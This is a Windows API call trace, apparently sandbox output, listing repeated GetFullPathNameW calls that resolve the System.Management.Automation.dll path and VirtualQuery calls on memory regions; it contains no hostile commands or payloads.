	[0336.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.820] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.820] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.821] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.822] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.822] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.822] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] VirtualQuery (in: lpAddress=0x26ba90, lpBuffer=0x26c950, dwLength=0x30 | out: lpBuffer=0x26c950*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] VirtualQuery (in: lpAddress=0x26ba90, lpBuffer=0x26c950, dwLength=0x30 | out: lpBuffer=0x26c950*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.250] VirtualQuery (in: lpAddress=0x26ba90, lpBuffer=0x26c950, dwLength=0x30 | out: lpBuffer=0x26c950*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
